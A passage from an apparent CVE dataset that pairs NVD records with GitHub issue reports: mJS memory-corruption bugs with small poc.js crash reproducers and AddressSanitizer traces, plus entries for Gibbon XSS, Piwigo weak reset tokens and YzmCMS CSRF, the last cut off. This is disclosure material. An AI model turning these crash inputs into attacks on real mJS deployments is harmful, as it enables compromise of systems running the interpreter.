"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_GCC=gcc
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(function() {
((function JSEtest(a Number) {
if (a > 0) {
gc((JSON.stringify(gc('#1.1: -0 - -0 === 0. Actual: '))) !== JSON.stringify('#1.1: -0 - -0 === 0. Actual: ' !== JSEtest(a - 1)))
}
})(6))
})()
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
=================================================================
==109655==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6110000004d6 at pc 0x559ce8d17a88 bp 0x7ffce13798c0 sp 0x7ffce13798b0
READ of size 1 at 0x6110000004d6 thread T0
#0 0x559ce8d17a87 in snquote src/mjs_json.c:81
#1 0x559ce8d17a87 in to_json_or_debug src/mjs_json.c:167
#2 0x559ce8d17a87 in mjs_json_stringify src/mjs_json.c:267
#3 0x559ce8d17a87 in mjs_op_json_stringify src/mjs_json.c:494
#4 0x559ce8cd2244 in mjs_execute src/mjs_exec.c:853
#5 0x559ce8cdba05 in mjs_exec_internal src/mjs_exec.c:1073
#6 0x559ce8cdba05 in mjs_exec_file src/mjs_exec.c:1096
#7 0x559ce8c98909 in main src/mjs_main.c:47
#8 0x7f97d5af7b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#9 0x559ce8c99449 in _start (/usr/local/bin/Gmjs+0xe449)
0x6110000004d6 is located 0 bytes to the right of 214-byte region [0x611000000400,0x6110000004d6)
allocated by thread T0 here:
#0 0x7f97d61a9f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x559ce8daa346 in mbuf_resize src/common/mbuf.c:50
SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs_json.c:81 in snquote
Shadow bytes around the buggy address:
0x0c227fff8040: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
0x0c227fff8050: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c227fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fff8070: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa
0x0c227fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c227fff8090: 00 00 00 00 00 00 00 00 00 00[06]fa fa fa fa fa
0x0c227fff80a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c227fff80b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fff80c0: 00 04 fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==109655==ABORTING
```
| Heap-buffer-overflow src/mjs_json.c:81 in snquote | https://api.github.com/repos/cesanta/mjs/issues/192/comments | 0 | 2021-12-31T05:33:31Z | 2021-12-31T05:33:31Z | https://github.com/cesanta/mjs/issues/192 | 1,091,426,355 | 192 | 3,148 |
CVE-2021-46525 | 2022-01-27T21:15:10.160 | Cesanta MJS v2.20.0 was discovered to contain a heap-use-after-free via mjs_apply at src/mjs_exec.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/199"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/199"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/cesanta/mjs/issues/199 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_GCC=gcc
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
function T(f) {}
function JSEtest(b) {
T.apply.apply(T.apply, []);
if (b < 10)
JSEtest(T.apply, []);
}
JSEtest(0);
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
=================================================================
======ERROR: AddressSanitizer: heap-use-after-free on address 0x6040000000f8 at pc 0x5590f9ee05d6 bp 0x7fff0f0dc5b0 sp 0x7fff0f0dc5a0
READ of size 8 at 0x6040000000f8 thread T0
#0 0x5590f9ee05d5 in mjs_apply src/mjs_exec.c:1156
#1 0x5590f9ee08d4 in mjs_apply_ src/mjs_exec.c:515
#2 0x5590f9ed4244 in mjs_execute src/mjs_exec.c:853
#3 0x5590f9edda05 in mjs_exec_internal src/mjs_exec.c:1073
#4 0x5590f9edda05 in mjs_exec_file src/mjs_exec.c:1096
#5 0x5590f9e9a909 in main src/mjs_main.c:47
#6 0x7f009363db96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#7 0x5590f9e9b449 in _start (/usr/local/bin/Gmjs+0xe449)
0x6040000000f8 is located 40 bytes inside of 48-byte region [0x6040000000d0,0x604000000100)
freed by thread T0 here:
#0 0x7f0093ceff30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x5590f9facdf8 in mbuf_insert src/common/mbuf.c:90
previously allocated by thread T0 here:
#0 0x7f0093ceff30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x5590f9facdf8 in mbuf_insert src/common/mbuf.c:90
SUMMARY: AddressSanitizer: heap-use-after-free src/mjs_exec.c:1156 in mjs_apply
Shadow bytes around the buggy address:
0x0c087fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff8000: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00
=>0x0c087fff8010: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd[fd]
0x0c087fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
Credits: Found by OWL337 team.
| Heap-use-after-free src/mjs_exec.c:1156 in mjs_apply | https://api.github.com/repos/cesanta/mjs/issues/199/comments | 0 | 2021-12-31T05:41:58Z | 2022-01-12T02:19:47Z | https://github.com/cesanta/mjs/issues/199 | 1,091,428,077 | 199 | 3,149 |
CVE-2021-46526 | 2022-01-27T21:15:10.207 | Cesanta MJS v2.20.0 was discovered to contain a global buffer overflow via snquote at src/mjs_json.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/191"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/191"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/cesanta/mjs/issues/191 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_GCC=gcc
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(JSON.stringify([1, 2, 3]))((JSON.parse - 10900)(JSON.stringify([1, 2, 3])));
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
=================================================================
====ERROR: AddressSanitizer: global-buffer-overflow on address 0x5570a88f30e4 at pc 0x5570a8803a88 bp 0x7ffc63d95f40 sp 0x7ffc63d95f30
READ of size 1 at 0x5570a88f30e4 thread T0
#0 0x5570a8803a87 in snquote src/mjs_json.c:81
#1 0x5570a8803a87 in to_json_or_debug src/mjs_json.c:167
#2 0x5570a8803a87 in mjs_json_stringify src/mjs_json.c:267
#3 0x5570a8803a87 in mjs_op_json_stringify src/mjs_json.c:494
0x5570a88f30e4 is located 0 bytes to the right of global variable '*.LC1' defined in 'src/mjs_array.c' (0x5570a88f30e0) of size 4
'*.LC1' is ascii string '%lu'
0x5570a88f30e4 is located 60 bytes to the left of global variable '*.LC9' defined in 'src/mjs_array.c' (0x5570a88f3120) of size 5
'*.LC9' is ascii string 'this'
SUMMARY: AddressSanitizer: global-buffer-overflow src/mjs_json.c:81 in snquote
Shadow bytes around the buggy address:
0x0aae951165c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aae951165d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aae951165e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aae951165f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aae95116600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0aae95116610: 00 00 00 00 00 00 00 00 00 00 00 00[04]f9 f9 f9
0x0aae95116620: f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9
0x0aae95116630: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 00 04 f9 f9
0x0aae95116640: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0aae95116650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aae95116660: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 00 00 04
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
====ABORTING
```
| Global-buffer-overflow src/mjs_json.c:81 in snquote | https://api.github.com/repos/cesanta/mjs/issues/191/comments | 0 | 2021-12-31T05:31:36Z | 2021-12-31T05:31:36Z | https://github.com/cesanta/mjs/issues/191 | 1,091,425,933 | 191 | 3,150 |
CVE-2021-46527 | 2022-01-27T21:15:10.250 | Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via mjs_get_cstring at src/mjs_string.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/197"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/197"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cesanta/mjs/issues/197 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_GCC=gcc
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
function JSEtest(a) {
(typeof((typeof"cookie-present" !== gc("$$abcdabcd")) !== function() {
return 100;
})) !== function() {
return 100;
};
if ("cookie-present" !== gc("$$abcdabcd"))
gc(true);
if (a < 10)
load(gc(JSON.stringify({ foo: [], bar: {} }, ['foo', 'bar', 'myProp'])));;
if (a < 1)
JSEtest(a+1);;
}
JSEtest(0)
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
=====ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60f000000203 at pc 0x5581d25fa021 bp 0x7ffff5880770 sp 0x7ffff5880760
READ of size 1 at 0x60f000000203 thread T0
#0 0x5581d25fa020 in mjs_get_cstring src/mjs_string.c:213
#1 0x5581d253f5aa in mjs_load src/mjs_builtin.c:58
#2 0x5581d2559244 in mjs_execute src/mjs_exec.c:853
#3 0x5581d2562a05 in mjs_exec_internal src/mjs_exec.c:1073
#4 0x5581d2562a05 in mjs_exec_file src/mjs_exec.c:1096
#5 0x5581d251f909 in main src/mjs_main.c:47
#6 0x7f20b4fd4b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#7 0x5581d2520449 in _start (/usr/local/bin/Gmjs+0xe449)
Address 0x60f000000203 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs_string.c:213 in mjs_get_cstring
Shadow bytes around the buggy address:
0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1e7fff8000: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c1e7fff8010: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
0x0c1e7fff8020: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
0x0c1e7fff8030: 00 00 00 00 00 00 00 00 00 00 06 fa fa fa fa fa
=>0x0c1e7fff8040:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
Credits: Found by OWL337 team. | Heap-buffer-overflow src/mjs_string.c:213 in mjs_get_cstring | https://api.github.com/repos/cesanta/mjs/issues/197/comments | 0 | 2021-12-31T05:39:31Z | 2022-01-12T02:19:19Z | https://github.com/cesanta/mjs/issues/197 | 1,091,427,555 | 197 | 3,151 |
CVE-2022-22868 | 2022-01-28T19:15:08.023 | Gibbon CMS v22.0.01 was discovered to contain a cross-site scripting (XSS) vulnerability, that allows attackers to inject arbitrary script via name parameters. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/GibbonEdu/core/issues/1594"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/truonghuuphuc/CVE"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/truonghuuphuc/CVE/blob/main/CVE-2022-22868.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/GibbonEdu/core/issues/1594"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/truonghuuphuc/CVE"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/truonghuuphuc/CVE/blob/main/CVE-2022-22868.pdf"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gibbonedu:gibbon:22.0.01:*:*:*:*:*:*:*",
"matchCriteriaId": "05336491-04BE-4BAC-BBE1-D96C7C734B3C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/GibbonEdu/core/issues/1594 | [
"Third Party Advisory"
] | github.com | [
"GibbonEdu",
"core"
] | [ Content removed by admin to follow proper security disclosure measures ] | Notification for Gibbon version v22.0.01 | https://api.github.com/repos/GibbonEdu/core/issues/1594/comments | 1 | 2022-01-03T03:47:42Z | 2022-01-11T06:22:11Z | https://github.com/GibbonEdu/core/issues/1594 | 1,092,200,332 | 1,594 | 3,152 |
CVE-2016-3735 | 2022-01-28T20:15:08.437 | Piwigo is image gallery software written in PHP. When a criteria is not met on a host, piwigo defaults to usingmt_rand in order to generate password reset tokens. mt_rand output can be predicted after recovering the seed used to generate it. This low an unauthenticated attacker to take over an account providing they know an administrators email address in order to be able to request password reset. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": null,
"url": "http://piwigo.org/release-2.8.1%2C"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/commit/f51ee90c66527fd7ff634f3e8d414cb670da068d"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://github.com/Piwigo/Piwigo/issues/470%2C"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "http://piwigo.org/release-2.8.1%2C"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/commit/f51ee90c66527fd7ff634f3e8d414cb670da068d"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/Piwigo/Piwigo/issues/470%2C"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "294E7F72-0D7D-4B0C-B05E-B58EFB07CF35",
"versionEndExcluding": "2.8.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"335"
] | 335 | https://github.com/Piwigo/Piwigo/issues/470%2C | null | github.com | [
"Piwigo",
"Piwigo"
] | Current functions used to generate random strings are not "that much random" (depending on the PHP version and operating system).
| increase randomness on generate_key | https://api.github.com/repos/Piwigo/Piwigo/issues/470/comments | 0 | 2016-04-26T09:03:40Z | 2018-01-15T12:20:36Z | https://github.com/Piwigo/Piwigo/issues/470 | 151,080,998 | 470 | 3,153 |
CVE-2022-23887 | 2022-01-28T21:15:10.197 | YzmCMS v6.3 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete user accounts via /admin/admin_manage/delete. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
